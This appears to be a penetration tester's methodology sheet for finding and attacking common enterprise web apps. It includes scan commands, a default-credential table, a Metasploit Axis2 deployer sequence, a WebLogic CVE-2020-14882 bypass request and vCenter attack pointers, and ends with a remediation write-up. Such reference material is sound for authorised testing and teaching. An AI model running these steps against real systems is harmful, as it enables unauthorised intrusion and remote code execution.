🛡️ Methodology Checklist
- Web port scan: nmap -p 80,443,8000,8080,8443,8888 -sV [TARGET]
- Screenshot all web services: eyewitness --web -f hosts.txt
- Triage screenshots: prioritise login pages, vendor UIs, unusual apps
- Test default credentials for all identified applications
- Axis2: default axis2/axis2 → upload malicious AAR service for RCE
- Zabbix: check API endpoints, default Admin/zabbix credentials
- vCenter: ESXi shell, DCUI, API → high-value target
- Document all identified applications and versions
🎯 Operational Context
Use when: common enterprise applications are identified during enumeration → cross-reference each with known CVEs and default credentials.
Think Dumber First: nmap -sV gives the app version → searchsploit app version → ExploitDB PoC. For web apps, check default creds first (admin/admin, admin/changeme). Vendor docs list default creds → always check the vendor docs.
Skip when: N/A; this is a reference document for common app discovery.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA scans/web-ports -iL scope.txt | Web port discovery across scope (feeds into EyeWitness) |
| eyewitness --web -x scans/web-ports.xml -d eyewitness_output | Visual screenshot report from Nmap XML |
| cat scans/web-ports.xml \| aquatone -nmap -out aquatone_output | Alternative screenshotter with visual clustering |
| whatweb -a3 [URL] | Aggressive web app fingerprinting for niche CMS/frameworks |
| ffuf -w [WORDLIST] -u [URL]/FUZZ -mc 200,401 | Find hidden admin portals and config files |
| searchsploit [APP_NAME] [VERSION] | Find CVEs for identified application version |
| msfconsole -q; search axis2_deployer | Axis2 WAR deploy exploit module |
| curl -s http://[TARGET_IP]/axis2/axis2-admin/ | Check for Axis2 admin panel (default: admin:axis2) |
| curl -s http://[TARGET_IP]/WebSphere/console/ | Check WebSphere admin console (default: system:manager) |
| curl -s http://[TARGET_IP]/nagios/ | Check Nagios panel (default: nagiosadmin:PASSW0RD) |
| curl -s http://[TARGET_IP]:5480/ | vCenter VAMI interface check |
🔬 Deep Dive & Workflow
Application Discovery Workflow
```bash
# Step 1: Compile scope
cat scope.txt   # IPs, FQDNs, vhosts

# Step 2: Web port scan (common ports only; don't waste time on all 65k)
sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA scans/web-initial -iL scope.txt

# Step 3: Visual recon
eyewitness --web -x scans/web-initial.xml -d eyewitness_out
# → Opens eyewitness_out/report.html in browser
# → Sort by "401 Unauthorized" → default login pages
# → Sort by "Default Page" → unconfigured services
# OR Aquatone (groups visually similar pages):
cat scans/web-initial.xml | aquatone -nmap -out aquatone_out -timeout 10000
# IMPORTANT: always pass -out [dirname]; without it, aquatone fails with "Failed to create output directory"

# Step 4: Deep scan interesting targets
sudo nmap -sC -sV -p- -oA scans/deepdive [TARGET_IP]
```
EyeWitness triage tips:
- 401 Unauthorized + Default Page = weak cred opportunity
- Sort by page title: "Dashboard", "Admin", "Console" = high value
- Look for Java-based stack indicators (Tomcat header, WEB-INF dirs)
- vHost routing: missing /etc/hosts entry = wrong application served
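Added example, not part of the original checklist: a small Python parser that turns the Nmap XML written by the -oA scan in Step 2 into an inventory of open HTTP(S) URLs with product and version, and separates out the services Nmap could not version so they get manual fingerprinting (whatweb, 404 page, /about) before the searchsploit step. The XML sample is constructed, and the function names `parse_web_services` and `searchsploit_terms` are this example's own.

```python
import xml.etree.ElementTree as ET

# Constructed stand-in for scans/web-ports.xml (Nmap -oA output); not a real scan.
SAMPLE_NMAP_XML = """<nmaprun>
<host><address addr="10.0.0.5" addrtype="ipv4"/><ports>
 <port protocol="tcp" portid="8080"><state state="open"/>
  <service name="http" product="Apache Tomcat" version="9.0.31"/></port>
 <port protocol="tcp" portid="443"><state state="open"/>
  <service name="http" product="VMware vCenter" tunnel="ssl"/></port>
</ports></host>
<host><address addr="10.0.0.7" addrtype="ipv4"/><ports>
 <port protocol="tcp" portid="7001"><state state="closed"/><service name="http"/></port>
 <port protocol="tcp" portid="5480"><state state="open"/>
  <service name="http" tunnel="ssl"/></port>
</ports></host>
</nmaprun>"""


def parse_web_services(xml_text):
    """Return one record per open HTTP(S) port: url, product, version."""
    records = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # --open drops these, but a full scan's XML keeps them
            svc = port.find("service")
            if svc is None or not svc.get("name", "").startswith("http"):
                continue
            # Nmap marks TLS-wrapped services with tunnel="ssl"
            scheme = "https" if svc.get("tunnel") == "ssl" else "http"
            records.append({
                "url": f"{scheme}://{addr}:{port.get('portid')}/",
                "product": svc.get("product", ""),
                "version": svc.get("version", ""),
            })
    return records


def searchsploit_terms(records):
    """'product version' strings for searchsploit; URLs with no version go to
    manual fingerprinting (whatweb, 404 page, /about) instead."""
    terms, unversioned = [], []
    for r in records:
        if r["product"] and r["version"]:
            terms.append(f"{r['product']} {r['version']}")
        else:
            unversioned.append(r["url"])
    return terms, unversioned
```

Point it at a real scans/web-ports.xml by replacing SAMPLE_NMAP_XML with the file's contents; the unversioned list is the input to the "version not visible" row of the troubleshooting table.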
Notable Application Abuse Paths
| Application | Detection | Default Creds | Primary Attack |
|---|---|---|---|
| Axis2 | /axis2/axis2-admin/ | admin:axis2 | Upload .aar service file → RCE |
| WebSphere | /WebSphere/console/ | system:manager | Admin console → WAR deploy |
| Zabbix | /zabbix/ | Admin:zabbix | API abuse or System.run command → RCE |
| Nagios | /nagios/ | nagiosadmin:PASSW0RD | Version-specific RCE or plugin abuse |
| WebLogic | :7001/console | weblogic:welcome1 | Java deserialization (CVE-2020-14882/14883) |
| vCenter | :443 / :5480 | administrator@vsphere.local | File upload (OVA), Struts2 RCE, SSRF |
| Wikis | Confluence, DokuWiki | varies | Search for: "password", "key", "config", SSH keys |
Axis2: WAR/AAR File Upload RCE
```
# Check for exposed admin panel
curl -s http://[TARGET_IP]:8080/axis2/axis2-admin/
# → Login page: default creds admin:axis2
# Create malicious Axis2 service file (.aar = zip with services.xml + class)
# Or use MSF module:
msf6 > use exploit/multi/http/axis2_deployer
msf6 > set RHOSTS [TARGET_IP]
msf6 > set RPORT 8080
msf6 > set USERNAME admin
msf6 > set PASSWORD axis2
msf6 > run
```
WebLogic: Java Deserialization (CVE-2020-14882/14883)
```bash
# Check version via T3 protocol header
nmap -p 7001 --script weblogic-detect [TARGET_IP]
# CVE-2020-14882 → Authentication bypass to admin console
curl "http://[TARGET_IP]:7001/console/css/%252E%252E%252F%252E%252E%252Fconsole.portal"
# CVE-2020-14883 → RCE once authenticated/bypassed
# POST to /console/images/ with XML deserialization payload
# ysoserial is the standard toolchain for gadget chain generation
# Check ExploitDB for PoCs:
searchsploit WebLogic 2020
```
vCenter: Attack Surface
```bash
# Identify version
curl -sk https://[TARGET_IP]/sdk | grep -i version
# CVE-2021-21985 → RCE via vSphere Client plugin (unauthenticated)
searchsploit vCenter 2021
# CVE-2021-22005 → File upload to RCE
# SSRF via /ui/vropsDrillDownServlet
# vCenter VAMI (Virtual Appliance Management): port 5480
# If Windows-based vCenter:
# → JuicyPotato or PrintSpoofer after initial foothold (SYSTEM context)
```
The Curiosity Mindset
Default credential checklist (try before exploits):
- admin:admin
- admin:password
- admin:[company_name]
- [app_name]:password
- See application-specific defaults in the table above
"Golden Chain" for unknown/niche apps:
1. Fingerprint β version β searchsploit
2. Check default credentials
3. Look for file upload functionality (even for legitimate purposes)
4. Look for "Execute command" built-in features (Zabbix System.run, Jenkins Script Console)
5. Check for .git directories on web root
Scanner blind spots:
- Nessus "no criticals" → check Informational for Nexus Repository, vCenter, JBoss
- Manual browsing reveals: "support desk", "wiki", "monitoring" portals
- osTicket "Attached Files" → RCE (never assume small apps are safe)
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Application version not visible | No version in headers or response | Check 404 error page, login page source, and /about or /version endpoints |
| Default creds list incomplete | Generic list | Search: [APP_NAME] default credentials on vendor documentation pages |
| searchsploit version match too strict | Exact version required | Search broader: searchsploit [APP_NAME] then manually filter by version range |
| Known exploit requires specific config | PoC assumptions wrong | Read PoC source; identify prerequisites (auth required, specific module enabled, etc) |
| App fingerprinted incorrectly | Wappalyzer misidentification | Confirm manually: inspect HTTP headers, HTML source, cookie names, error messages |
📋 Reporting Trigger
Finding Title: Common Enterprise Application Vulnerable to Known Exploit
Impact: Identified enterprise application version matches a known public exploit, enabling rapid exploitation without vulnerability research and reducing attacker time-to-compromise to minutes using freely available tools.
Root Cause: Common enterprise application not updated to address a publicly disclosed vulnerability. No asset management or vulnerability scanning tracking common application versions.
Recommendation: Implement vulnerability scanning that covers common enterprise applications. Establish patch SLAs for critical CVEs. Remove or isolate vulnerable applications that cannot be immediately patched.